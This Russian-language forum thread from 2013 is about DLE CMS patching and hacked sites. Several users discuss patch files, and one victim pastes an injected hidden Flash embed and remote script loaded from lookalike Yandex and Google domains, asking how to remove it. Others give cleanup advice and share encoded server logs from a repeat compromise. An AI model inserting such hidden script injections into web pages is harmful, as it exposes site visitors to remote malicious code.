Schmied, я вот не пойму, вы топик вообще читаете? ВОТ!

Вставить три строки, сохранить, и у вас будет свой файл!

Belos, всё я читаю, и человек написал, что:



теперь улавливаете суть просьбы?

из ссылки что указана



просто можно не писать вручную, а скопировать и вставить

"прописал руками", это и имеется в виду, что копипаст, а не заменой файла. Вы прям меня совсем за глупого держите

мне почему интересно глянуть на свежий файл из дистриба, чтобы посмотреть, вдруг там ещё чего добавлено нового, о чём "забыли" упомянуть в теме на сайте разработчика DLE.

Сообщение отредактировал Schmied - 19.9.2013, 1:09

Schmied, Belos, хватит уже
Один другого наверное не понимает

Чем руками ковырять, я просто с дистрибутива взял файл и переписал.
Вот как выглядит данный код из свежего дистрибутива


Поэтому я не стал руками прописывать как указано на их сайте, а просто заменил файлы.

Ну наверное я второй день торможу... когда написал что там 3 строки кода ))

Приветствуют, у себя нашел нашел такую фигню <embed src="http://webmasters-yandex.ру/flash.swf?776507719" width="1" height="1" type="application/x-shockwave-flash" AllowScriptAccess="always" pluginspage="http://www.macromedia.ком/go/getflashplayer"></embed></object><script async="async" type="text/javascript" src="http://google-webmaster.ру/14bfa6bb14875e45bba028a21ed38046.js"></script> на странице сайта, подскажите, где оно прописано, чтобы удалить? Спасибо. Нашел прямо в новости, а есть ли еще где-нить?

Сообщение отредактировал Andronus - 19.9.2013, 15:52

Тут выложили скрипт чистки БД, а так же дали ссылку на инструкцию по защите.

Если берете сомнительный код (слитую версию движка)
а также сомнительные плагины скрипты, с паблика, да даже шаблон, проверяйте всё на сторонние линки
в том числе и базу проверяйте на сторонние линки, это хорший совет на будущее, а также на наличие Base64

не разбираетесь, не умеете попросите знакомого посмотреть, нет знакомых есть уйма php форумов, выложите в соответствующей ветке, попросите посмотреть людей, что к чему если есть подозрения

Сообщение отредактировал BRONX - 19.9.2013, 16:57

После удаления из базы данных скрипта, обновления DLE до последней версии и патча /engine/classes/min/index.php
взломали второй раз.
Измененных файлов нет, только javascript код внедренный в базу.


В логах нашел строки типа:
/15171-driver-portable.html++Result:+\xd0\xbe\xd1\x88\xd0\
xb8\xd0\xb1\xd0\xba\xd0\xb0:+"\xd0\x9e\xd1\x88\xd0\xb8\xd0\xb1\xd0\xba\xd0\xb0+\xd1\x80\xd0\xb5\xd0\xb3\xd0\xb8\xd1\x81\xd1\x82\xd1\x80\xd0\xb0\xd1\x86\xd0\xb8\xd0\xb8"
;+\xd0\xb8\xd1\x81\xd0\xbf\xd0\xbe\xd0\xbb\xd1\x8c\xd0\xb7\xd0\xbe\xd0\xb2\xd0\xb0\xd0\xbd+\xd0\xbd\xd0\xb8\xd0\xba\xd0\xbd\xd0\xb5\xd0\xb9\xd0\xbc+"Kiradchr";+\xd0\xb7
\xd0\xb0\xd1\x80\xd0\xb5\xd0\xb3\xd0\xb8\xd1\x81\xd1\x82\xd1\x80\xd0\xb8\xd1\x80\xd0\xbe\xd0\xb2\xd0\xb0\xd0\xbb\xd0\xb8\xd1\x81\xd1\x8c+(\xd0\xb2\xd0\xba\xd0\xbb\xd1\x
8e\xd1\x87\xd0\xb5\xd0\xbd+\xd1\x80\xd0\xb5\xd0\xb6\xd0\xb8\xd0\xbc+\xd1\x82\xd0\xbe\xd0\xbb\xd1\x8c\xd0\xba\xd0\xbe+\xd1\x80\xd0\xb5\xd0\xb3\xd0\xb8\xd1\x81\xd1\x82\xd
1\x80\xd0\xb0\xd1\x86\xd0\xb8\xd0\xb8);

15171-driver-portable.html++Result:+%D0%BE%D1%88%D0%B8%D0%B1%D0%BA%D0%B0:
+%22%D0%9E%D1%88%D0%B8%D0%B1%D0%BA%D0%B0+%D1%80%D0%B5%D0%B3%D0%B8%D1%81%D1%82%D1%80%D0%B0%D1%86%D0%B8%D0%B8%22;+%D0%B8%D1%81%D0%BF%D0%BE%D0%BB%D1%8C%D0%B7%D0%BE%D0%B2%D
0%B0%D0%BD+%D0%BD%D0%B8%D0%BA%D0%BD%D0%B5%D0%B9%D0%BC+%22Kiradchr%22;+%D0%B7%D0%B0%D1%80%D0%B5%D0%B3%D0%B8%D1%81%D1%82%D1%80%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BB%D0%B8%D
1%81%D1%8C+%28%D0%B2%D0%BA%D0%BB%D1%8E%D1%87%D0%B5%D0%BD+%D1%80%D0%B5%D0%B6%D0%B8%D0%BC+%D1%82%D0%BE%D0%BB%D1%8C%D0%BA%D0%BE+%D1%80%D0%B5%D0%B3%D0%B8%D1%81%D1%82%D1%80%
D0%B0%D1%86%D0%B8%D0%B8%29;

Кто может подсказать как расшифровать закодированные символы? Это SQL инъекция?